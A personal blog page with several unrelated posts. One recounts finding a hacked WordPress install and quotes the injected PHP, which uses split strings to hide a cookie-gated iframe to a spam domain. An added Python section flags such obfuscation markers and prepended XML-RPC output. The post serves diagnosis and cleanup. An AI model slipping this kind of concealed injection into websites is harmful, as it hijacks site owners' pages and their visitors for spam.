TurboGears 2 Sprint, Nov 15th/16th

On Saturday 15th and Sunday 16th of November there is a worldwide sprint organised for TG2 and its related projects.

Mark Ramm and Chris Perkins are hosting the sprint in Atlanta, GA at the Predictix offices and I am hosting the sprint at the Languagelab offices in London, UK. There is also something being organised in Madrid, Spain by Alberto Valverde and Gustavo Narea with the details to be announced.

If you can come to any of these locations or want to host a new location in your area for this sprint, please update the wiki so we can get an idea of numbers. If you can’t make it to any of the locations, never fear! We welcome remote sprinters and we’ll all be collaborating in IRC and via Trac. The more eyes we can have on the code during the sprint, the better!

What can you do?

There are many tasks available to be getting on with, no matter what your level of expertise. There are beginner and intermediate tasks listed, as well as tasks for various subprojects, so there’s plenty for everyone to do.

Come along, either in person or virtually, and get involved. =)

TurboGears


Nasty little spammers

Today I thought I’d give the WordPress iPhone app a try since I’m going to try to blog more frequently in the near future. I was slightly irritated that it didn’t work, but I assumed that there was some kind of bug in the system that was preventing it from working with my blog.

After using my best google-fu I couldn’t find anything that would prevent me from adding the basic settings and so I downloaded a trial version of MarsEdit to see if that also choked on my site.

Unfortunately my hunch was proven correct and I couldn’t make MarsEdit connect to my blog.

Since I’ve written XML-RPC client and server code in the past I fired up TextMate and IPython to see if I could diagnose the problem.

I turned on pdb debugging, set up an xmlrpclib.Server instance and tried to call the demo.sayHello() method which resulted in an instant exception. The data that the server returned worried me immensely:

<iframe src=http://googlerank.info/counter style=display:none></iframe> <script language="JavaScript" type="text/javascript">document.cookie = "ireiw=5;expires=Sun, 01-Dec-2009 08:00:00 GMT;path=/";</script><?xml version="1.0"?>
<methodResponse>
  <params>
    <param>
      <value>
        <string>Hello!</string>
      </value>
    </param>
  </params>
</methodResponse>

That, my friends, is the result of a hacked WordPress installation. This irked me. A lot. Not only are these bastards not content with flooding every post on my blog with spam comments and trackbacks (which has caused me to turn off comments on my older posts, something I really didn’t want to do), they’ve gone and invaded my server to make themselves a little more money. The only reason I actually found this was that the HTML injected in front of the XML declaration made the XML-RPC response invalid; had I never tried to use XML-RPC I wouldn’t have seen it, for reasons I’ll explain below.

So, now I had to trawl through my WordPress files to see where this invasion was taking place. I checked my database first, which came back clean, followed by my themes and plugins. I hit paydirt in both of these places. One was a simple modification to the footer.php of my K2 theme (which wasn’t active, so it was never rendered, though a tampered PHP file sitting in a web-reachable directory still needs cleaning out) and one was a not so simple modification to my markdown plugin.

Searching through the source for “iframe” or “googlerank.info” revealed nothing, but that’s because the spammer had split the strings with PHP’s concatenation operator, so neither term appears contiguously anywhere in the file:

if (!isset($_COOKIE["ireiw"])) echo '<if'.'rame src=http://googl'.'erank.info/counter style=display:none'.'></ifra'.'me> <s'.'cr'.'ipt language="JavaScr'.'ipt" '.'type="text/'.'javascript">d'.'ocument.cookie '.'= "ireiw=5;expires=Sun, 0'.'1-Dec-2009 08:00:00 GMT;path='.'/";<'.'/script>';

Assholes. So this hidden iframe is only emitted if the “ireiw” cookie has not already been set for the visitor, meaning each browser sees it once; it reappears only if the visitor uses a different browser or clears their cookies. For this reason I never noticed it on my site’s main pages, but search spiders, which generally don’t keep cookies between requests, would have seen it every damn time.
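The two checks above, spotting content that arrives before the `<?xml` declaration and finding a payload that a plain grep misses because its strings are split with PHP’s `.` operator, as an added Python example. This is my code, not anything from the original post or from WordPress: it joins adjacent string literals until a fixed point so that indicators such as googlerank.info and <iframe become visible, and it shows why the XML-RPC client choked. The sample PHP line is the injected snippet quoted above; the two responses are constructed to match the one shown. The indicator list and the scan_tree helper are my own assumptions about what is worth flagging, not a complete signature set.

```python
"""Find PHP payloads hidden by string concatenation, and flag XML-RPC
responses with junk prepended. Added example, not code from the post."""
import os
import re
import xmlrpc.client
from xml.parsers.expat import ExpatError

# A PHP string literal: single- or double-quoted, backslash escapes allowed.
_STR = r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\""
# Two literals joined by the concatenation operator, e.g.  'if'.'rame'
_CONCAT = re.compile(rf"({_STR})\s*\.\s*({_STR})")


def collapse_concat(src: str) -> str:
    """Join adjacent literals until nothing changes: 'if'.'rame' -> 'iframe'.
    This is a heuristic normalisation for scanning, not a PHP interpreter:
    when the two literals use different quote styles the first quote is kept."""
    def merge(m: re.Match) -> str:
        a, b = m.group(1), m.group(2)
        return a[0] + a[1:-1] + b[1:-1] + a[0]
    prev = None
    while prev != src:              # every pass removes at least one '.'
        prev = src
        src = _CONCAT.sub(merge, src)
    return src


# Assumption: my own short list of things worth a second look, not a full signature set.
INDICATORS = (
    "<iframe", "display:none", "document.cookie", "googlerank.info",
    "$_cookie", "eval(", "base64_decode(", "gzinflate(",
)


def find_indicators(src: str) -> list:
    """Indicators present in src, compared case-insensitively."""
    low = src.lower()
    return [i for i in INDICATORS if i in low]


def scan_source(src: str) -> dict:
    """What a plain grep sees ('raw') versus what only the collapsed source reveals ('hidden')."""
    raw = find_indicators(src)
    collapsed = find_indicators(collapse_concat(src))
    return {"raw": raw, "hidden": sorted(set(collapsed) - set(raw))}


def scan_tree(root: str):
    """Yield (path, report) for every .php file under root whose collapsed form reveals something."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    report = scan_source(fh.read())
                if report["hidden"]:
                    yield path, report


def leading_junk(raw: str) -> str:
    """Whatever precedes the XML declaration in an XML-RPC response ('' if clean)."""
    idx = raw.find("<?xml")
    return raw if idx < 0 else raw[:idx]


def parse_response(raw: str):
    """(True, params) for a well-formed methodResponse, otherwise (False, reason)."""
    try:
        params, _method = xmlrpc.client.loads(raw)
        return True, params
    except (ExpatError, ValueError) as exc:
        return False, str(exc)


# The injected line quoted above, exactly as found in the markdown plugin.
INJECTED_PHP = r"""if (!isset($_COOKIE["ireiw"])) echo '<if'.'rame src=http://googl'.'erank.info/counter style=display:none'.'></ifra'.'me> <s'.'cr'.'ipt language="JavaScr'.'ipt" '.'type="text/'.'javascript">d'.'ocument.cookie '.'= "ireiw=5;expires=Sun, 0'.'1-Dec-2009 08:00:00 GMT;path='.'/";<'.'/script>';"""

# Constructed responses shaped like the one the server returned.
CLEAN_RESPONSE = (
    '<?xml version="1.0"?>\n'
    "<methodResponse>\n"
    "  <params>\n"
    "    <param>\n"
    "      <value>\n"
    "        <string>Hello!</string>\n"
    "      </value>\n"
    "    </param>\n"
    "  </params>\n"
    "</methodResponse>\n"
)
TAINTED_RESPONSE = (
    "<iframe src=http://googlerank.info/counter style=display:none></iframe> "
    '<script language="JavaScript" type="text/javascript">document.cookie = '
    '"ireiw=5;expires=Sun, 01-Dec-2009 08:00:00 GMT;path=/";</script>'
) + CLEAN_RESPONSE

if __name__ == "__main__":
    print(scan_source(INJECTED_PHP))
    print(repr(leading_junk(TAINTED_RESPONSE)))
    print(parse_response(CLEAN_RESPONSE))
    print(parse_response(TAINTED_RESPONSE))
```

Point scan_tree at wp-content and read every file it reports; the collapse joins any two literals separated by a dot regardless of quote style, so a hit is something to open in an editor, not proof of compromise on its own. The same goes for the response check: anything before the XML declaration means some PHP file in the request path printed output it shouldn’t have.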

I have no idea when this act was perpetrated, nor which exploit they used but I’m mighty pissed. In my opinion this is tantamount to breaking into my house and rummaging around through my shit just to take a jar full of £3.07 worth of change - It feels pointless and violating and I really wish the internet weren’t so anonymous so there was actually some risk of being found out if you’re one of these dirty, low-down fucks who make money by ruining people’s (virtual) reputation.

Now I’m turning off XML-RPC and uninstalling the WordPress iPhone app because I really don’t want to be open to yet more possible exploits. Well done spammers. Another feature of my blogging software that I can’t rely on because you’re all unscrupulous asshats. Bravo.

Update (28 July 08): As Daniel pointed out in the comments to this post, I’m not 100% sure that XML-RPC was to blame for my blog being hacked and blaming it wholly for the issue was simply a case of a slightly irate post very soon after I fixed the issue. In the interest of not spreading FUD I need to clear that up.

Currently I cannot find anything about any XML-RPC exploits in WordPress 2.6, so if you’re up to date there shouldn’t be any problems. Bear in mind that updating WordPress does not revert edits made to plugin or theme files, so modified files like the ones above still have to be cleaned or replaced from a known-good copy separately.

IT
Wordpress


Entertainment is evolving, keep up!

This post started out as a comment on a post about some of the BBC’s offerings being made available on iTunes. Unfortunately the blog’s commenting system kept giving me errors when I was trying to comment, I suspect because my comment was rather lengthy, so I decided to post it here.

I noticed the “BBC Worldwide - programmes just added” link in the iTunes store just yesterday and immediately started buying episodes of Spooks as I had missed the series when it was on TV. Combined with the episodes of season 4 of Lost available the day after they’ve aired on Sky One on a Sunday, this is the first time I’ve actually felt like buying any TV content via the iTunes store, since the selection of shows available to us in the UK is, quite frankly, dismal. This has also stayed my hand when considering buying myself an Apple TV unit. There’s just not enough viable content available on our poor, neglected island to make me bite at that hook.

Rory Cellan-Jones says:

It is the first time the BBC has asked UK viewers to pay to download content, and it will be interesting to see how they react. Millions have been happy to pay for DVDs of series like Little Britain - but will they react differently when they are asked to shell out for something they can’t stick on a shelf?

I think the entertainment industry really underestimates their consumers and their willingness to pass over their hard earned cash for entertainment, even when it’s not packaged in a way that lets you hold it in your hands. A DVD is simply a means of transporting the data contained therein; with today’s online society why would you need a DVD when the internet is beginning to be a perfectly good transportation medium? The reason people are still buying DVDs and CDs more than buying media online is because buying online is difficult due to the myriad of DRM issues in the industry. Only when there is no DRM do things improve. At the moment, the majority of media without DRM is pirated though.

Yes, you can see all these BBC offerings on TV. Yes, you could hear your favourite music on the radio. The problem is, you’re not able to watch them when or where you want to. You’re bound by the broadcaster’s schedule that may or may not mesh with your own, and you’re forced to use a specific piece of equipment to do so.

I would (and frequently do) pay a reasonable price for my entertainment if it means I can enjoy it as often as I want, on whichever platform I want, without any restrictions. And that, right there, seems to be the painful bit for the entertainment industry: Without Restrictions

If I’m paying for my entertainment directly, I don’t want to be told that it won’t work on platform_01 or player_03 because “we, the publishers, don’t want it to”. Real, documented technical reasons are fine, if not slightly annoying, but they’re excusable.

DRM is, in my opinion, driving piracy as people simply do not want to have artificial restrictions placed on their media. The problem is that the industry is seeing the issue in reverse. They see the fact that media can be copied and distributed at a fantastic rate as a downside. They see people transferring pirated copies and think “these guys are cutting into our margins”! This is entirely the wrong way of looking at it, and the industry needs to catch up. Using current technology you can distribute your media at a small price to an unreasonably large audience across the world with sinfully minimal overheads in the grand scheme of things. Small price - smaller overhead + large audience = large profits.

Obviously I’m putting a lot of faith in humanity here, but there will always be people who will just share their media and allow people who want to spend time looking for it to download it. To treat every single one of your consumers as if they are potential thieves does not make consumers. Perhaps, instead of warnings about piracy, notes of thanks for supporting artists should be displayed.

Maybe I’m being far too optimistic here, dreaming of a utopian society where the majority are honest and don’t want their entertainment to stop, paying fair dues for a good product; I don’t think that the world is that bad though. I still believe there’s a legitimate profit to be made from the honest individuals without resorting to excluding them based on the platform they choose to consume their media.

Current technology allows people to pirate material easier than ever before but the majority of the population would, I think, rather pay to get their media directly from the source to get their entertainment fix. Anyone I know who has downloaded media has done it because they couldn’t get hold of it from the publishing source, the publishing source penalised them for not being on a particular platform or the price of the media was far too high to make them get out their wallet.

The quicker the big media companies realise this, and I think they are starting to with a new generation of high level management starting to filter through the rank and file, the better.

Observations
Ze Critic


Hi, I’m a spam trap.

Recently this blog has been attracting a lot of spam and Akismet doesn’t seem to be keeping up with the deluge. I’ve decided to disable comments at the moment due to my own lack of activity here.

I am intending to take up blogging again at some point in the near future but for the moment I have a lot to focus on and, quite frankly, I don’t have the energy to come and moderate 30 or so spam comments every day, not to mention the other 15 or so daily spam comments that actually make it onto the blog.

Once I start regularly blogging again sometime in the next few months I will obviously re-enable comments and hopefully Akismet will be working with the efficiency it used to.

General
Wordpress


Sanctuary

I’ve just found Sanctuary, “The First Broadcast Caliber (sic) Online Sci-Fi Series” and it looks like it could be a decent little series, especially considering some of the names involved. Amanda Tapping of Stargate fame not only stars in Sanctuary but is also Executive Producer, and there are a few members of the Stargate: Atlantis team in the cast too.

After watching the trailer and some of the fairly poor quality free version of the first ‘webisode’ I decided that I should just buy the upcoming episodes - at just over £1.80 per episode (£1.60 if you buy the four episode bundle) I figured I’ve spent more money on worse products in my time.

Although the first episode seemed a little ‘bitty’ and could have probably done with some better editing I’m definitely going to be watching the next few episodes to see how it pans out. I’m not going to drop any spoilers but there are some quite tasty hooks in between the character introductions that will make you curious for more.

General
IT


Mmm… Python

You are Python. You are slower than others, but easier to understand. You are a minimalist, who doesn't like clutter.
Which Programming Language are You?

First try, no cheating :)

General
